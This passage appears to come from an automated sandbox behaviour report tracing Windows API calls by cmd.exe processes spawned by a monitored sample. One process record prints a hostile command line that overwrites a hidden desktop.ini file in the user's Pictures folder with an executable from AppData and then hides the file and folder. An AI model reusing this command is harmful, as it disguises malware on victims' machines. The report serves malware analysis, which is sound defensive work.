lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] GetFileType (hFile=0x4c) returned 0x1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] GetFileType (hFile=0x4c) returned 0x1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] GetFileType 
(hFile=0x4c) returned 0x1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] GetFileType (hFile=0x4c) returned 0x1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] GetFileType (hFile=0x4c) returned 0x1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] GetFileType (hFile=0x4c) returned 0x1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] GetFileType (hFile=0x4c) returned 0x1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] GetFileType (hFile=0x4c) returned 0x1 [0142.270] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0142.270] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.270] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0142.270] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.270] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] GetFileType (hFile=0x4c) returned 0x1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] GetFileType (hFile=0x4c) returned 0x1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] GetFileType (hFile=0x4c) returned 0x1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] GetFileType (hFile=0x4c) returned 0x1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, 
lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] GetFileType (hFile=0x4c) returned 0x1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] GetFileType (hFile=0x4c) returned 0x1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] GetFileType (hFile=0x4c) returned 0x1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] GetFileType (hFile=0x4c) returned 0x1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0142.271] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.271] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0142.271] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.271] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x32, lpOverlapped=0x0) returned 1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] GetFileType (hFile=0x4c) returned 0x1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] GetFileType (hFile=0x4c) returned 0x1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.272] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x32, lpOverlapped=0x0) returned 1 [0142.272] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.272] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0142.272] _close (_FileHandle=4) returned 0 [0142.272] FindNextFileW (in: hFindFile=0x3f0e50, lpFindFileData=0x2cef84 | out: lpFindFileData=0x2cef84) returned 0 [0142.272] GetLastError () returned 0x12 [0142.272] FindClose (in: hFindFile=0x3f0e50 | out: hFindFile=0x3f0e50) returned 1 [0142.273] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0142.273] _close (_FileHandle=3) returned 0 [0142.273] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.273] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.273] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.273] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.274] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.274] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.274] SetConsoleInputExeNameW () returned 0x1 [0142.274] GetConsoleOutputCP () returned 0x1b5 [0142.274] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.274] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.274] exit (_Code=0) Process: id = "181" 
image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ec0" os_pid = "0xf90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15204 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15205 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15206 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15207 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 15208 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15209 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 
region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15210 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15211 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15212 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 15213 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16238 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16239 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16240 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16241 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 16242 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 16243 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16244 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = 
mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16245 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16246 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16247 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16248 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16249 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16250 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16251 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16252 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 16253 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: 
"c:\\windows\\system32\\imm32.dll") Region: id = 16254 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16255 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16256 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16257 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16258 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16259 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 16260 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 16261 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 16399 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 238 os_tid = 0xf98 [0142.106] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f8e4 | out: lpSystemTimeAsFileTime=0x20f8e4*(dwLowDateTime=0x8ea20320, dwHighDateTime=0x1d440a9)) [0142.106] GetCurrentProcessId () returned 0xf90 [0142.106] GetCurrentThreadId () returned 0xf98 [0142.106] GetTickCount () returned 0x2c7ff [0142.106] QueryPerformanceCounter (in: 
lpPerformanceCount=0x20f8dc | out: lpPerformanceCount=0x20f8dc*=19889504874) returned 1 [0142.107] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0142.107] __set_app_type (_Type=0x1) [0142.107] __p__fmode () returned 0x76b331f4 [0142.107] __p__commode () returned 0x76b331fc [0142.107] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0142.107] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0142.107] GetCurrentThreadId () returned 0xf98 [0142.107] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf98) returned 0x38 [0142.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0142.107] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0142.107] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.107] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0142.107] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f874 | out: phkResult=0x20f874*=0x0) returned 0x2 [0142.108] VirtualQuery (in: lpAddress=0x20f8ab, lpBuffer=0x20f844, dwLength=0x1c | out: lpBuffer=0x20f844*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.108] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f844, dwLength=0x1c | out: lpBuffer=0x20f844*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0142.108] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f844, dwLength=0x1c | out: lpBuffer=0x20f844*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, 
State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0142.108] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f844, dwLength=0x1c | out: lpBuffer=0x20f844*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.108] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f844, dwLength=0x1c | out: lpBuffer=0x20f844*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0142.108] GetConsoleOutputCP () returned 0x1b5 [0142.108] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.108] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0142.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.108] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0142.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.108] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.109] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.109] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.109] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.109] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.109] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.109] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0142.109] GetEnvironmentStringsW () returned 0x310418* [0142.110] FreeEnvironmentStringsW (penv=0x310418) returned 1 [0142.110] GetEnvironmentStringsW () returned 0x310418* [0142.110] FreeEnvironmentStringsW (penv=0x310418) returned 1 [0142.110] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e7e4 | out: phkResult=0x20e7e4*=0x40) returned 0x0 [0142.110] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x0, lpData=0x20e7f0*=0xc8, lpcbData=0x20e7e8*=0x1000) returned 0x2 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x1, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x0, lpData=0x20e7f0*=0x1, lpcbData=0x20e7e8*=0x1000) returned 0x2 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x0, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x40, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x40, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x0, lpData=0x20e7f0*=0x40, lpcbData=0x20e7e8*=0x1000) returned 0x2 [0142.110] RegCloseKey (hKey=0x40) returned 0x0 [0142.110] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e7e4 | out: phkResult=0x20e7e4*=0x40) returned 0x0 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e7ec, 
lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x0, lpData=0x20e7f0*=0x40, lpcbData=0x20e7e8*=0x1000) returned 0x2 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x1, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x0, lpData=0x20e7f0*=0x1, lpcbData=0x20e7e8*=0x1000) returned 0x2 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x0, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.111] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x9, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.111] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x9, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.111] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x0, lpData=0x20e7f0*=0x9, lpcbData=0x20e7e8*=0x1000) returned 0x2 [0142.111] RegCloseKey (hKey=0x40) returned 0x0 [0142.111] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0142.111] srand (_Seed=0x5b886370) [0142.111] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"" [0142.111] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"" [0142.111] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.111] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x311b78, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0142.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0142.112] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 